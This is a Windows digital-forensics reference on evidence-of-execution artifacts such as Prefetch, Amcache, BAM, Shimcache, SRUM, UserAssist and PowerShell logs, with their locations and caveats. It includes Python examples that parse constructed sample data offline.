
Evidence of Execution

Techniques that can be used to discover evidence in support of program execution post-breach or during an attack.

Windows

ActivitiesCache.db (Windows Timeline)

Windows 10 introduced a background feature that records recently used applications and accessed files over a rolling 30 day window and presents them in a “Timeline” view reached through Task View (WIN+TAB). The data is recorded in a SQLite database. Windows 11 removed the Timeline view from Task View, however the ActivitiesCache.db database is still maintained.

Research identified that Windows Server 2016 also maintains an ActivitiesCache.db file, however ActivityOperation, Activity_PackageId, and Activity entries were not recorded.

WIN: 10, 11
SRV: 2016 (file present, but activity entries are not recorded; see note above)

Location

# Local Account
C:\Users\%USERNAME%\AppData\Local\ConnectedDevicesPlatform\L.%USERNAME%\ActivitiesCache.db

# Online (Microsoft) Account, where %CID% is the account's cloud ID
C:\Users\%USERNAME%\AppData\Local\ConnectedDevicesPlatform\%CID%\ActivitiesCache.db

Interpretation and Investigative Notes

  • Files within the L.%USERNAME% (or %CID%) directory:
    • ActivitiesCache.db: SQLite database
    • ActivitiesCache.db-wal: write-ahead log. Holds committed activity records that have not yet been checkpointed into the main database file. Acquire it together with the .db and -shm files; copying the .db alone silently loses those records. A reboot or clean close of the database forces the checkpoint.
    • ActivitiesCache.db-shm: shared-memory index for the WAL
  • The Activity table contains evidence such as:
    • ActivityType: activity performed, stored as an integer (ExecuteOpen, InFocus, CopyPaste, etc.)
    • Executable: parent application used to open or execute the file, carried in the AppId JSON column
    • DisplayText: title of the file or application
    • ContentInfo: possible content information, not always present
    • Timestamps: StartTime, EndTime, LastModifiedTime and ExpirationTime are Unix epoch seconds in UTC. StartTime and EndTime give the execution window; the duration is derived from them rather than stored.
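The WAL caveat above is the one that costs analysts evidence, so here is an added example (not code from the original page) that demonstrates it against a simplified stand-in for ActivitiesCache.db. The Activity table schema, the ActivityType code mapping and the sample rows are constructed for the example and are not the real database's full schema; the table is created before switching to WAL mode to mimic a database that has been checkpointed at least once since the profile was created.

```python
import json
import shutil
import sqlite3
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Assumed ActivityType codes, matching what public Windows Timeline parsers
# report for the common record types.
ACTIVITY_TYPES = {5: "ExecuteOpen", 6: "InFocus", 10: "CopyPaste"}

# Constructed sample rows: (ActivityType, AppId JSON, StartTime, EndTime).
# Times are Unix epoch seconds in UTC, as the real Activity table stores them.
SAMPLE_ROWS = [
    (5, '[{"application":"C:\\\\Windows\\\\System32\\\\notepad.exe","platform":"windows_win32"}]',
     1700000000, 1700000420),
    (6, '[{"application":"C:\\\\Windows\\\\System32\\\\notepad.exe","platform":"windows_win32"}]',
     1700000000, 1700000420),
]


def build_timeline_db(directory):
    """Create a simplified ActivitiesCache.db in WAL mode and commit the sample rows.

    The schema is a stand-in with only the columns this example reads; the real
    Activity table has many more. The table is created before switching to WAL
    so the schema itself sits in the main file, like a database that has been
    checkpointed at least once since the user profile was created.
    """
    conn = sqlite3.connect(str(directory / "ActivitiesCache.db"))
    conn.execute("CREATE TABLE Activity (Id INTEGER PRIMARY KEY, ActivityType INTEGER,"
                 " AppId TEXT, StartTime INTEGER, EndTime INTEGER)")
    conn.commit()
    conn.execute("PRAGMA journal_mode=WAL")
    conn.executemany("INSERT INTO Activity (ActivityType, AppId, StartTime, EndTime)"
                     " VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()  # committed, but in WAL mode the rows now live in ActivitiesCache.db-wal
    return conn


def read_activities(db_path):
    """Return the execution-relevant fields from an Activity table."""
    conn = sqlite3.connect(str(db_path))
    try:
        rows = conn.execute("SELECT ActivityType, AppId, StartTime, EndTime FROM Activity"
                            " ORDER BY StartTime, Id").fetchall()
    finally:
        conn.close()
    activities = []
    for activity_type, app_id, start, end in rows:
        # AppId is a JSON array; the first element carries the parent executable
        executable = json.loads(app_id)[0]["application"]
        activities.append({
            "type": ACTIVITY_TYPES.get(activity_type, f"Unknown({activity_type})"),
            "executable": executable,
            "start": datetime.fromtimestamp(start, tz=timezone.utc),
            "end": datetime.fromtimestamp(end, tz=timezone.utc),
            "duration_s": end - start,
        })
    return activities


def copy_main_file_only(live_conn, src_dir, dst_dir, checkpoint):
    """Copy only ActivitiesCache.db (no -wal/-shm), as a careless acquisition would.

    With checkpoint=False the committed rows are still only in the -wal and the
    copy shows none of them. With checkpoint=True the WAL is first folded into
    the main file, which is what a reboot or clean close does.
    """
    if checkpoint:
        live_conn.execute("PRAGMA wal_checkpoint(TRUNCATE)")
    shutil.copyfile(src_dir / "ActivitiesCache.db", dst_dir / "ActivitiesCache.db")
    return read_activities(dst_dir / "ActivitiesCache.db")


def demo():
    """Build the sample database and compare the two acquisition outcomes."""
    with tempfile.TemporaryDirectory() as tmp:
        live, before, after = (Path(tmp) / n for n in ("live", "copy_before", "copy_after"))
        for d in (live, before, after):
            d.mkdir()
        conn = build_timeline_db(live)
        try:
            seen_before = copy_main_file_only(conn, live, before, checkpoint=False)
            seen_after = copy_main_file_only(conn, live, after, checkpoint=True)
        finally:
            conn.close()
    return {
        "rows_in_copy_before_checkpoint": len(seen_before),
        "rows_in_copy_after_checkpoint": len(seen_after),
        "activities": seen_after,
    }


if __name__ == "__main__":
    for activity in demo()["activities"]:
        print(activity["type"], activity["executable"], activity["start"].isoformat(),
              f"{activity['duration_s']}s")
```

The copy taken before the checkpoint contains the schema and zero activity rows even though every row was committed; the same copy taken after the checkpoint has them all. On a live host the equivalent of the checkpoint is a reboot, so when imaging a running machine collect the -wal and -shm files alongside the .db, or parse the three together with a SQLite library.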

Tools

Sources

AmCache.hve

Amcache.hve is a registry hive file maintained by the Application Experience infrastructure (the ProgramDataUpdater scheduled task and, on Windows 10 and later, the compatibility appraiser). It records details of executables that were installed on, present on or run from the system, including full path, file metadata and a SHA1 hash.

WIN: 7 (with the Application Experience update), 8, 10, 11
SRV: 2012 R2, 2016, 2019, 2022

Location

C:\Windows\AppCompat\Programs\Amcache.hve

Interpretation and Investigative Notes

  • Windows 7 and 8: one subkey per file under Amcache.hve\Root\File\{Volume GUID}\#######, where ####### is the file's MFT entry number in hex.
  • Windows 10 and 11: entries under Amcache.hve\Root\InventoryApplicationFile\<name>|<id> (per executable) and Amcache.hve\Root\InventoryApplication (per installed program).
  • Each entry records the full path, the file's $STANDARD_INFORMATION last modification time, the volume the file resides on and, on Windows 10 and later, the publisher, version, link date and FileId (SHA1 of the first 31 MB of the file, prefixed with "0000").
  • The key's last write time approximates when the file was first inventoried and is commonly treated as a first-run time, but it is not proof of execution.
  • Caveat: entries are also created for executables that were merely scanned or installed (for example by the compatibility inventory task), so corroborate with Prefetch, BAM or event logs before asserting that a file ran.

Tools

Sources

Background Activity (BAM) and Desktop Activity Moderator (DAM)

Background Activity Moderator (BAM) is a kernel driver (C:\Windows\System32\drivers\bam.sys), introduced with Windows 10 version 1709, that controls the activity of background applications; as a side effect it records, per user SID, the full path of each executable run and the time it last ran. Desktop Activity Moderator (DAM) uses the same structure but is only populated on tablets and other Connected Standby devices; on desktop hosts the dam key exists but is empty.

BAM and DAM entries are short-lived: they are cleared on reboot or once an entry has been in the key for more than 7 days, so these keys record recent activity only. Executables run from removable media are also not recorded in BAM or DAM.

WIN: 10 (v1709 and later), 11
SRV: 2019, 2022

Location

# BAM (Windows 10 v1809 and later, Windows 11, Server 2019 and later)
HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\{SID}

# BAM (Windows 10 v1709 and v1803 only: no "State" subkey)
HKLM\SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}

# DAM
HKLM\SYSTEM\CurrentControlSet\Services\dam\State\UserSettings\{SID}

An offline SYSTEM hive has no CurrentControlSet; that name is a link to ControlSet001 or ControlSet002 on the live system. Read the Current value under HKLM\SYSTEM\Select to learn which ControlSet was active (the other typically holds the LastKnownGood configuration) and parse that one.

Interpretation and Investigative Notes

Each value under the {SID} key is named with the device path of an executable that was run (for example \Device\HarddiskVolume3\Windows\System32\cmd.exe). The value data is a 24-byte binary structure whose first 8 bytes are a 64-bit FILETIME (UTC) of the last execution; Version and SequenceNumber are key metadata, not executables. Map the \Device\HarddiskVolumeN prefix to a drive letter via HKLM\SYSTEM\MountedDevices, and resolve the SID to a username through HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList or the SAM hive.
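As an added example (not code from the original page), the following Python parses a `reg export` of a BAM UserSettings\{SID} key offline and decodes the FILETIME in each value. The export text, SID, paths and timestamps are constructed for the example; the hex wrapping with a trailing backslash reproduces how reg.exe splits long values.

```python
import re
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed sample: the text of `reg export` for one BAM UserSettings\{SID}
# key (reg.exe writes UTF-16LE; decoded to str here). The SID, paths and
# timestamps are fabricated for this example.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\bam\State\UserSettings\S-1-5-21-1111111111-2222222222-3333333333-1001]
"Version"=dword:00000001
"SequenceNumber"=dword:0000002a
"\\Device\\HarddiskVolume3\\Windows\\System32\\cmd.exe"=hex:00,00,6d,c6,47,17,da,01,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00
"\\Device\\HarddiskVolume3\\Users\\analyst\\Downloads\\update.exe"=hex:00,68,31,28,50,17,da,01,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00
'''

VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def filetime_to_datetime(ft):
    """64-bit FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_reg_export(text):
    """Minimal reg.exe export parser: {key_path: {value_name: data}}.

    hex: data becomes bytes, dword: becomes int, strings are returned unquoted.
    Lines ending in a backslash are continuation lines and are joined first.
    """
    keys, current, lines, i = {}, None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].rstrip()
        i += 1
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        match = VALUE_LINE.match(line)
        if not match or current is None:
            continue
        # reg.exe escapes backslashes and quotes inside value names
        name = match.group(1).replace('\\\\', '\\').replace('\\"', '"')
        data = match.group(2)
        while data.endswith("\\") and i < len(lines):
            data = data[:-1] + lines[i].strip()
            i += 1
        if data.startswith("dword:"):
            keys[current][name] = int(data[6:], 16)
        elif data.startswith("hex:"):
            keys[current][name] = bytes(int(b, 16) for b in data[4:].split(",") if b)
        else:
            keys[current][name] = data.strip('"')
    return keys


def parse_bam(keys):
    """Extract (sid, device path, last run UTC) from BAM/DAM UserSettings keys.

    Value names that are executable paths begin with a backslash (device
    paths); Version and SequenceNumber are key metadata and are skipped. The
    first 8 bytes of each 24-byte value are the last-execution FILETIME in UTC.
    """
    records = []
    for key_path, values in keys.items():
        if "\\UserSettings\\" not in key_path:
            continue
        sid = key_path.rsplit("\\", 1)[1]
        for name, data in values.items():
            if not (name.startswith("\\") and isinstance(data, bytes) and len(data) >= 8):
                continue
            last_run = int.from_bytes(data[:8], "little")
            records.append({"sid": sid, "path": name, "last_run": filetime_to_datetime(last_run)})
    return sorted(records, key=lambda r: r["last_run"])


if __name__ == "__main__":
    for rec in parse_bam(parse_reg_export(SAMPLE_REG)):
        print(rec["last_run"].isoformat(), rec["sid"], rec["path"])
```

On a live host the same data can be exported with `reg export HKLM\SYSTEM\CurrentControlSet\Services\bam\State bam.reg` and fed to `parse_reg_export` after decoding the UTF-16LE file; the \Device\HarddiskVolumeN prefixes still need mapping through MountedDevices to become drive letters.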

Tools

Sources

Jump List

Jump Lists are the Windows taskbar feature (Windows 7 and later) that lets users “jump” to items they have used frequently or recently. These can be files, applications and directories, which are the items of most forensic significance.

The AutomaticDestinations directory contains one file per application, named with the 16-hex-digit Application ID (AppID) of that application, for example f01b4d95cf55d32a.automaticDestinations-ms for Windows Explorer on Windows 8.1. Each file is an OLE compound file whose numbered streams are LNK (shell link) structures, plus a DestList stream that holds per-entry access times and counts. Pinned items and application tasks live in the sibling CustomDestinations directory as <AppID>.customDestinations-ms files.

WindowsXP781011
  
Server2003R22008R22012R2201620192022
   

Location

%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations

Interpretation and Investigative Notes

  • The DestList stream records, per entry, the last access time, an access count (Windows 10 and later) and the target path; the embedded LNK streams carry the target's MAC timestamps, size, volume serial number and the MAC address of the host that created the link, which supports both execution timing and lateral-movement attribution.
  • AppIDs are stable across Windows client and server versions that support Jump Lists (Windows 7 / Server 2008 R2 onwards), so published AppID lists can be used to map a file name back to its application.

Tools

Sources

LastVisitedMRU

The LastVisitedMRU key tracks the executables that used the common Open/Save dialog to open the files recorded under the OpenSaveMRU key. In addition, each value records the directory of the last file accessed through that dialog by that application. This gives forensic insight into an application's execution and its file and folder interaction.

WIN: XP (LastVisitedMRU); 7, 8, 10, 11 (LastVisitedPidlMRU)
SRV: 2003 (LastVisitedMRU); 2008 and later (LastVisitedPidlMRU)

Location

# WINDOWS: XP
# SERVER: 2003
NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU

# WINDOWS: Vista and later (7, 8, 10, 11)
# SERVER: 2008 and later
NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU

# The companion OpenSaveMRU key is named OpenSavePidlMRU on Vista and later.

The NTUSER.DAT file is unique for each user on the target host.

Interpretation and Investigative Notes

Each value holds the name of an executable that presented a common Open/Save dialog, followed by the folder (as a PIDL shell item list) of the last file accessed through that dialog. The MRUListEx value orders the entries most-recent-first, and the key's last write time dates the most recent use. Example: notepad.exe was last used to open or save a file under %USERPROFILE%\Desktop. This proves the application was running when the dialog was used; the file itself is recorded under OpenSavePidlMRU.

Tools

Sources

Prefetch

Prefetch increases system performance by pre-loading code pages of commonly used applications. For roughly the first ten seconds after a program starts, the Cache Manager records the files and directories it references and writes them to a .pf file, which is why the presence of a .pf file is evidence that the program was executed.

  • Limited to 128 .pf files on XP, Vista and Windows 7
  • Limited to 1024 .pf files on Windows 8 and later
  • File name: <EXE_NAME>-<HASH>.pf, where the hash is computed from the executable's full path (and, for hosting processes such as svchost.exe, dllhost.exe, mmc.exe and rundll32.exe, from the command line as well), so the same binary run from two locations leaves two .pf files
WIN: XP, 7, 8, 10, 11
SRV: 2003 through 2022 (disabled by default, see below)

Although Prefetch is available on Windows Server, it is disabled by default. To enable it (I was unable to get this working on Windows Server 2022), take the following steps. Keep in mind that it must be enabled before any malicious activity occurs and will not provide retrospective artifacts. Prefetch can also be turned off by default when the system detects an SSD, and is re-enabled the same way.

  1. Update or create the EnablePrefetcher DWORD value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters
  2. Set EnablePrefetcher to: 0 = disabled, 1 = application launch prefetching enabled, 2 = boot prefetching enabled, 3 = application launch and boot prefetching enabled
  3. Ensure the SysMain (Superfetch) service is set to start automatically and is running; without it no .pf files are written, which is the usual reason the registry change alone has no visible effect on Server

Location

C:\Windows\Prefetch

Interpretation and Investigative Notes

  • Each .pf file records the executable name, run count, the last run time(s), and the files and directories (with volume name, serial number and creation time) referenced during the first seconds of execution.
  • Date/time a file by that name and path was first executed: creation date of the .pf file, about 10 seconds after the launch.
  • Date/time it was last executed: the last run timestamp inside the .pf (and the file's modified time), again about 10 seconds after the launch.
    • Windows 8 and later store the last 8 run times inside the file.
  • Windows 10 and later compress .pf files (MAM header, XPRESS Huffman), so a parser that decompresses them is required.
  • Absence of a .pf file does not prove non-execution: prefetching may be disabled, the file cap reached, or the file deleted.

Tools

Sources

RecentApps

Windows 10 tracked program execution via the RecentApps registry key, but only for a limited range of builds.

WIN: 10 (v1607 through v1709 only)
SRV: NULL

Only Microsoft Windows 10 versions v1607 to v1709 appear to populate the RecentApps registry key.

Location

NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps

Interpretation and Investigative Notes

  • Each GUID subkey represents one recently used application:
    • AppId = path or name of the application
    • LastAccessTime = last execution time (FILETIME, UTC)
    • LaunchCount = number of times executed
  • RecentItems subkeys beneath each application record the files it opened (Name, Path, LastAccessedTime).

Tools

Sources

Shimcache (AppCompatCache)

The Shimcache (also known as AppCompatCache) is part of the Application Compatibility Infrastructure, which lets older applications run on newer Windows versions by applying compatibility "shims" instead of requiring a rewrite. When an application is launched, Windows checks whether it needs shimming and records the executable's full path, its $STANDARD_INFORMATION last modification time and (on XP) file size in a cache that is held in memory and written to the SYSTEM hive.

WIN: XP, 7, 8, 10, 11
SRV: 2003, 2008 R2, 2012 R2, 2016, 2019, 2022

Location

# WINDOWS: XP
# SERVER: 2003
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatibility  (value: AppCompatCache)

# WINDOWS: Vista and later (7, 8, 10, 11)
# SERVER: 2008 and later
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache  (value: AppCompatCache)

Interpretation and Investigative Notes

This value records executables whose compatibility was checked on the system, which for most entries means they were launched, and can be used to determine on which hosts malware or other programs of interest were present. Interpret the timestamps carefully: the per-entry time is the executable's $STANDARD_INFORMATION last modification time, not an execution time. The ordering of entries (most recently inserted first) and the hive's last write time are what bound when the activity occurred.

  • Windows XP holds a maximum of 96 entries, each with a LastUpdateTime that changes when the executable is run.
  • Windows 7 and later hold a maximum of 1024 entries with no LastUpdateTime. Windows 7 and 8 entries carry an insertion flag indicating the file was actually executed; Windows 10 dropped that flag.
  • The cache lives in memory and is written to the SYSTEM hive only at shutdown or reboot (Windows 7 and later), so the hive of a live or recently booted system can lag a full session behind.

The value is a raw binary structure that regedit.exe cannot display meaningfully, so parsing with a dedicated tool is required.

Entries do not always indicate execution: on some versions a file is added when it is merely viewed in Explorer or otherwise processed before any execution. Prove execution through multiple artifacts where possible.
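Because the value is raw binary, the following added example (not code from the original page) parses the Windows 10/11 AppCompatCache layout from an exported value. The sample value is constructed inline by a small serialiser so the block runs offline; on a real case the bytes come from the AppCompatCache value in an acquired SYSTEM hive. The layout used (header size at offset 0, then "10ts" entries) is the Windows 10 format; older versions differ and are not handled here.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
ENTRY_SIGNATURE = b"10ts"           # marks each entry in the Windows 10/11 format
HEADER_SIZE_1703_PLUS = 0x34        # 0x30 on Windows 10 builds before 1703

FT_2023_11_14 = 133444736000000000  # FILETIME for 2023-11-14 22:13:20 UTC
FT_2023_11_13 = FT_2023_11_14 - 86400 * 10_000_000


def filetime_to_datetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def build_entry(path, last_modified_ft, data=b""):
    """Serialise one Windows 10 entry (used here only to construct sample input)."""
    upath = path.encode("utf-16-le")
    body = (struct.pack("<H", len(upath)) + upath
            + struct.pack("<Q", last_modified_ft)
            + struct.pack("<I", len(data)) + data)
    return ENTRY_SIGNATURE + struct.pack("<I", 0) + struct.pack("<I", len(body)) + body


# Constructed sample AppCompatCache value: header followed by two entries,
# most recently inserted first, as it would be read from the SYSTEM hive.
SAMPLE_VALUE = (
    struct.pack("<I", HEADER_SIZE_1703_PLUS) + b"\x00" * (HEADER_SIZE_1703_PLUS - 4)
    + build_entry(r"C:\Users\analyst\Downloads\update.exe", FT_2023_11_14)
    + build_entry(r"C:\Windows\System32\cmd.exe", FT_2023_11_13)
)


def parse_win10_appcompatcache(blob):
    """Parse a Windows 10/11 AppCompatCache value into entries in cache order.

    Entry layout: "10ts" | 4 bytes unused | 4-byte entry size | 2-byte path
    length | UTF-16LE path | 8-byte FILETIME ($STANDARD_INFORMATION modified)
    | 4-byte data size | data. Position 0 is the most recently inserted entry;
    the FILETIME is the file's modification time, not when it ran.
    """
    header_size = struct.unpack_from("<I", blob, 0)[0]
    if header_size not in (0x30, 0x34):
        raise ValueError(f"header size 0x{header_size:x} is not a Windows 10 cache")
    entries, pos = [], header_size
    while pos + 12 <= len(blob) and blob[pos:pos + 4] == ENTRY_SIGNATURE:
        entry_size = struct.unpack_from("<I", blob, pos + 8)[0]
        body = blob[pos + 12:pos + 12 + entry_size]
        path_len = struct.unpack_from("<H", body, 0)[0]
        path = body[2:2 + path_len].decode("utf-16-le")
        last_modified, data_len = struct.unpack_from("<QI", body, 2 + path_len)
        data_start = 2 + path_len + 12
        entries.append({
            "position": len(entries),
            "path": path,
            "last_modified": filetime_to_datetime(last_modified),
            "data": body[data_start:data_start + data_len],
        })
        pos += 12 + entry_size
    return entries


if __name__ == "__main__":
    for e in parse_win10_appcompatcache(SAMPLE_VALUE):
        print(e["position"], e["last_modified"].isoformat(), e["path"])
```

The position field is the only chronological information the cache gives: update.exe at position 0 was inserted after cmd.exe, regardless of what the two modification timestamps say. Treat the timestamp as "the binary on disk was this old when it was cached", never as an execution time.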

Tools

Sources

System Resource Usage Monitor (SRUM)

The System Resource Usage Monitor (SRUM) records roughly 30 to 60 days of historical resource usage, including which applications ran, the user account (SID) responsible for each, and the network bytes sent and received per application per hour. Much of this information populates the ‘App History’ tab in Task Manager.

WIN: 8, 10, 11
SRV: 2012 R2, 2016, 2019, 2022

Location

# Registry: provider configuration only; the usage records are not stored here
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SRUM\Extensions\{GUID}

# ESE database holding the records (one table per extension GUID listed below)
C:\Windows\System32\sru\SRUDB.dat

Interpretation and Investigative Notes

  • SRUDB.dat is an Extensible Storage Engine (ESE) database. It is locked while Windows is running and is usually in a dirty state when acquired, so copy it together with the sru*.log files using a raw-disk or volume shadow copy method, then run esentutl /r sru /i followed by esentutl /p SRUDB.dat on the copy before parsing.
  • Each table stores the application and user as integer IDs; the SruDbIdMapTable resolves them to application paths and SIDs. Records are flushed roughly hourly, so they bound rather than pinpoint execution times.
  • SRUM Extension GUIDs (table names in SRUDB.dat)
    • 973F5D5C-1D90-4944-BE8E-24B94231A174 - Windows Network Data Usage Monitor
    • D10CA2FE-6FCF-4F6D-848E-B2E99266FA86 - Push Notifications (WPN) Provider
    • D10CA2FE-6FCF-4F6D-848E-B2E99266FA89 - Application Resource Usage Provider (the main source of evidence of execution: per-application CPU time, foreground/background time and I/O)
    • DD6636C4-8929-4683-974E-22C046A43763 - Windows Network Connectivity Usage Monitor
    • FEE4E14F-02A9-4550-B5CE-5FA2DA202E37 - Energy Usage Provider
    • 5C8CF1C7-7257-4F13-B223-970EF5939312 - App Timeline Provider (Windows 10 and later)

Tools

Sources

UserAssist

UserAssist records GUI-based programs launched through the Explorer shell (double-click, Start menu, shortcuts) in the user's NTUSER.DAT hive, with a run count and last execution time per program. Programs started from a command prompt or spawned by other processes are generally not recorded here.

WIN: XP, 7, 8, 10, 11
SRV: 2003 through 2022 (present wherever the Explorer desktop shell is installed)

Location

# Offline hive
NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count

# Live registry
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count

Interpretation and Investigative Notes

  • Value names are ROT13 encoded, so decoding is trivial:
    • .RKR = .exe
    • .YAX = .lnk
    • Names often begin with a known-folder GUID, e.g. {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7} = System32, {F38BF404-1D43-42F2-9305-67DE0B28FC23} = Windows
  • Value data is binary, not ROT13:
    • Windows 7 and later (72 bytes): run count at offset 4, focus count at offset 8, focus time in milliseconds at offset 12, last execution FILETIME (UTC) at offset 60
    • Windows XP (16 bytes): run count at offset 4 (counting starts at 5, so subtract 5), last execution FILETIME at offset 8
  • GUID for XP
    • {75048700-EF1F-11D0-9888-006097DEACF9} - Active Desktop (value names carry UEME_RUNPATH, UEME_RUNPIDL and similar prefixes)
  • GUID for Win7/8/10/11
    • {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} - Executable file execution
    • {F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} - Shortcut file execution
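The following added example (not code from the original page) decodes UserAssist entries: ROT13 on the value name, expansion of the known-folder GUID prefix, and extraction of the run count and last execution FILETIME from the binary data. The value names and binary data are constructed inline for the example (the 72-byte values are built by a small helper), and the known-folder mapping assumes default locations on a C: system drive.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# UserAssist subkey GUIDs (Windows 7 and later)
GUID_EXECUTABLES = "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}"
GUID_SHORTCUTS = "{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}"

# Known-folder GUIDs that appear as path prefixes in value names. Assumed to
# resolve to the default locations on a C: system drive.
KNOWN_FOLDERS = {
    "1AC14E77-02E7-4E5D-B744-2EB1AE5198B7": r"C:\Windows\System32",
    "F38BF404-1D43-42F2-9305-67DE0B28FC23": r"C:\Windows",
    "6D809377-6AF0-444B-8957-A3773F02200E": r"C:\Program Files",
}

FT_2023_11_14 = 133444736000000000  # FILETIME for 2023-11-14 22:13:20 UTC


def filetime_to_datetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def make_win7_value(run_count, focus_count, focus_ms, last_run_ft):
    """Serialise the 72-byte Windows 7+ UserAssist value (only to build sample input)."""
    return (struct.pack("<IIII", 0, run_count, focus_count, focus_ms)
            + b"\x00" * 44 + struct.pack("<Q", last_run_ft) + b"\x00" * 4)


# Constructed sample: value names as stored (ROT13) under the executables GUID.
SAMPLE_COUNT_VALUES = {
    r"{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr":
        make_win7_value(7, 3, 120000, FT_2023_11_14),
    r"{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\ebbg\Bssvpr16\JVAJBEQ.RKR":
        make_win7_value(2, 1, 5000, FT_2023_11_14 - 3600 * 10_000_000),
}


def decode_userassist_entry(encoded_name, data):
    """Decode one UserAssist value: ROT13 name plus binary run data.

    Windows 7+: 72 bytes; run count at offset 4, focus count at 8, focus time
    (ms) at 12, last execution FILETIME at 60.
    Windows XP: 16 bytes; run count at offset 4 (stored starting from 5),
    last execution FILETIME at 8.
    """
    path = codecs.decode(encoded_name, "rot_13")
    for guid, folder in KNOWN_FOLDERS.items():
        prefix = "{" + guid + "}"
        if path.upper().startswith(prefix):
            path = folder + path[len(prefix):]
            break
    if len(data) == 72:
        run_count, focus_count, focus_ms = struct.unpack_from("<III", data, 4)
        last_run_ft = struct.unpack_from("<Q", data, 60)[0]
    elif len(data) == 16:
        run_count = max(struct.unpack_from("<I", data, 4)[0] - 5, 0)
        focus_count = focus_ms = None
        last_run_ft = struct.unpack_from("<Q", data, 8)[0]
    else:
        raise ValueError(f"unexpected UserAssist value length {len(data)}")
    return {
        "path": path,
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_ms": focus_ms,
        "last_run": filetime_to_datetime(last_run_ft) if last_run_ft else None,
    }


def decode_count_key(values):
    """Decode every value under a UserAssist {GUID}\\Count key, most recent first."""
    entries = [decode_userassist_entry(name, data) for name, data in values.items()]
    return sorted(entries, key=lambda e: e["last_run"] or EPOCH_1601, reverse=True)


if __name__ == "__main__":
    for e in decode_count_key(SAMPLE_COUNT_VALUES):
        print(e["last_run"].isoformat(), e["run_count"], e["path"])
```

A FILETIME of zero (returned here as None) is common for entries that were migrated or never run from the shell, so sort and filter on it rather than treating every entry as dated.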

Tools

Sources

PowerShell

PowerShell event logs record which cmdlets, scripts and script blocks were executed and by which user, which makes them a direct record of PowerShell-based execution. Module logging (event 4103) and script block logging (event 4104) must be enabled by policy, but PowerShell 5.0 and later write script blocks containing suspicious keywords to 4104 at Warning level even when the policy is off.

WIN: 7, 8, 10, 11 (4103/4104 require PowerShell 5.0 or later; built in from Windows 10)
SRV: 2008 R2, 2012 R2, 2016, 2019, 2022 (PowerShell 5.0 or later; built in from Server 2016)

Location

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx
C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx
C:\Windows\System32\winevt\Logs\PowerShellCore%4Operational.evtx  (PowerShell 7, if installed)

Interpretation and Investigative Notes

| Event Log | Event ID | Description | Details Recorded |
| --- | --- | --- | --- |
| Microsoft-Windows-PowerShell/Operational | 4103 | Module logging: a pipeline (cmdlet) executed | Cmdlet name and bound parameter values, host application and command line, user, script path if any. Requires the "Turn on Module Logging" policy. |
| Microsoft-Windows-PowerShell/Operational | 4104 | Script block logging: a script block was compiled for execution | Full de-obfuscated script block text (split into numbered parts, MessageNumber of MessageTotal, for large blocks), ScriptBlockId, script path, user SID. Blocks with suspicious content are logged at Warning level on PowerShell 5.0 and later even without the policy. |
| Microsoft-Windows-PowerShell/Operational | 4105 / 4106 | Script block invocation started / completed | ScriptBlockId and runspace ID. Only recorded when "Log script block invocation start/stop events" is enabled, and very noisy. |
| Microsoft-Windows-PowerShell/Operational | 4100 | Error during command or script execution | Error message, script path and line, user. |
| Windows PowerShell | 400 / 403 | Engine state changed to Available / Stopped (session start / end) | Host name, HostApplication (the full powershell.exe command line, including any -EncodedCommand), engine version. |
| Windows PowerShell | 600 | Provider lifecycle (e.g. "Provider Registry is Started") | Provider name and HostApplication command line; available even on older hosts without 4103/4104. |
| Windows PowerShell | 800 | Pipeline execution details (legacy module logging) | Command, user, HostApplication. |
